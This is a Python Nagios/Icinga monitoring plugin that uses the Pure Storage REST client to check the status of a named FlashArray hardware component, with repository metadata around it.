] | null | null | null | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2018, 2019, 2020 Pure Storage, Inc.
#
# * Overview
#
# This short Nagios/Icinga plugin code shows how to build a simple plugin to monitor Pure Storage FlashArrays.
# The Pure Storage Python REST Client is used to query the FlashArray.
#
# * Installation
#
# The script should be copied to the Nagios plugins directory on the machine hosting the Nagios server or the NRPE
# for example the /usr/lib/nagios/plugins folder.
# Change the execution rights of the program to allow the execution to 'all' (usually chmod 0755).
#
# * Dependencies
#
# nagiosplugin helper Python class library for Nagios plugins (https://github.com/mpounsett/nagiosplugin)
# purestorage Pure Storage Python REST Client (https://github.com/purestorage/rest-client)
"""Pure Storage FlashArray hardware components status
Nagios plugin to retrieve the current status of hardware components from a Pure Storage FlashArray.
Hardware status indicators are collected from the target FA using the REST call.
The plugin has three mandatory arguments: 'endpoint', which specifies the target FA, 'apitoken', which
specifies the autentication token for the REST call session and 'component', that is the name of the
hardware component to be monitored. The component must be specified using the internal naming schema of
the Pure FlashArray: i.e CH0 for the main chassis, CH1 for the secondary chassis (shelf 1), CT0 for controller 0,i
CT1 for controller 1i, CH0.NVB0 for the first NVRAM module, CH0.NVB1 for the second NVRAM module, CH0.BAY0 for
the first flash module, CH0.BAY10 for the tenth flash module, CH1.BAY1, for the first flash module on the
first additional shelf,...
"""
import argparse
import logging
import logging.handlers
import nagiosplugin
import purestorage
import urllib3
class PureFAhw(nagiosplugin.Resource):
"""Pure Storage FlashArray hardware status
Retrieves FA hardware component status
"""
def __init__(self, endpoint, apitoken, component):
self.endpoint = endpoint
self.apitoken = apitoken
self.component = component
self.logger = logging.getLogger(self.name)
handler = logging.handlers.SysLogHandler(address = '/dev/log')
handler.setLevel(logging.ERROR)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
@property
def name(self):
return 'PURE_FA_HW_' + str(self.component)
def get_status(self):
"""Gets hardware element status from flasharray."""
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
fainfo={}
try:
fa = purestorage.FlashArray(self.endpoint, api_token=self.apitoken)
fainfo = fa.get_hardware(component=self.component)
fa.invalidate_cookie()
except Exception as e:
self.logger.error('FA REST call returned "%s" ', e)
return(fainfo)
def probe(self):
fainfo = self.get_status()
status = fainfo.get('status')
name = fainfo.get('name')
if (status == 'not_installed') or (name != self.component):
return []
if (status == 'ok'):
metric = nagiosplugin.Metric(self.component + ' status', 0, context='default' )
else:
metric = nagiosplugin.Metric(self.component + ' status', 1, context='default')
return metric
def parse_args():
argp = argparse.ArgumentParser()
argp.add_argument('endpoint', help="FA hostname or ip address")
argp.add_argument('apitoken', help="FA api_token")
argp.add_argument('component', help="FA hardware component")
argp.add_argument('-v', '--verbose', action='count', default=0,
help='increase output verbosity (use up to 3 times)')
argp.add_argument('-t', '--timeout', default=30,
help='abort execution after TIMEOUT seconds')
return argp.parse_args()
@nagiosplugin.guarded
def main():
args = parse_args()
check = nagiosplugin.Check( PureFAhw(args.endpoint, args.apitoken, args.component) )
check.add(nagiosplugin.ScalarContext('default', '', '@1:1'))
check.main(args.verbose, args.timeout)
if __name__ == '__main__':
main()
| 39.189189 | 117 | 0.691494 | 1,675 | 0.385057 | 0 | 0 | 334 | 0.076782 | 0 | 0 | 2,273 | 0.522529 |